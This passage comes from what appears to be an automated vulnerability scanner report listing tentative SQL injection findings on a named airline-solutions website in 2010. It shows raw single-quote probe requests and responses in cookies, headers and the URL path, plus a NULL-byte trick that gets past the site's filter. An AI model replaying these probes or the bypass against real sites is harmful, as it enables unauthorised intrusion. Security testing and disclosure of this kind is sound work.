Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fproducts_services%2Fenterprise_operations%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:20:06 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.6. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/ [exp_last_activity cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/enterprise_operations/

Issue detail

The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/enterprise_operations/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321956'; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_web%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_accounting%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:11:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/enterprise_operations/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321956''; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_web%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_accounting%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:11:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321956%27%27; expires=Thu, 06-Oct-2011 03:11:25 GMT; path=/
Set-Cookie: exp_last_activity=1286352685; expires=Thu, 06-Oct-2011 03:11:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fproducts_services%2Fenterprise_operations%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A4%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_web%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:11:36 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.7. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost/ [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/enterprise_operations/control_cost/

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/enterprise_operations/control_cost/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079'; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:18:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322346; expires=Thu, 06-Oct-2011 03:18:01 GMT; path=/
Set-Cookie: exp_last_activity=1286353081; expires=Thu, 06-Oct-2011 03:18:01 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A54%3A%22%2Fproducts_services%2Fenterprise_operations%2Fcontrol_cost%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A3%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:18:06 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<p title="Focus on events only when they deviate from the established plan - alerts are generated when these events require intervention or direct management">Managing by exception when events deviate from plan</p>
...[SNIP]...

Request 2

GET /home/products_services/enterprise_operations/control_cost/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079''; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:18:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide
...[SNIP]...

2.8. http://www.sabreairlinesolutions.com/home/products_services/product/automated_exchange_and_refunds [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/automated_exchange_and_refunds

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/product/automated_exchange_and_refunds HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322645; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:07:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/automated_exchange_and_refunds HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322645; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:07:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322645; expires=Thu, 06-Oct-2011 02:08:07 GMT; path=/
Set-Cookie: exp_last_activity=1286348887; expires=Thu, 06-Oct-2011 02:08:07 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:08:59 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.9. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_acars_manager [exp_tracker cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_acars_manager

Issue detail

The exp_tracker cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_tracker cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/product/sabre_aircentre_acars_manager HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322611; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D%00';

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:03:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_aircentre_acars_manager HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322611; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D%00'';

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:03:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322611; expires=Thu, 06-Oct-2011 02:03:15 GMT; path=/
Set-Cookie: exp_last_activity=1286348595; expires=Thu, 06-Oct-2011 02:03:15 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:03:29 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23471


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.10. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_control/ [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_crew_control/

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/product/sabre_aircentre_crew_control/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1%00'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322045; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A1%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A2%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:47:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_aircentre_crew_control/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1%00''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322045; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A1%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A2%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:48:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322045; expires=Thu, 06-Oct-2011 01:48:06 GMT; path=/
Set-Cookie: exp_last_activity=1286347686; expires=Thu, 06-Oct-2011 01:48:06 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A2%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A4%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:48:27 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.11. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_manager/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_crew_manager/

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/product/sabre_aircentre_crew_manager'/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_inventory%2F%22%3B%7D;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:21:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_aircentre_crew_manager''/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_inventory%2F%22%3B%7D;

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:21:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322049; expires=Thu, 06-Oct-2011 02:21:57 GMT; path=/
Set-Cookie: exp_last_activity=1286349716; expires=Thu, 06-Oct-2011 02:21:57 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fpage-not-found%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
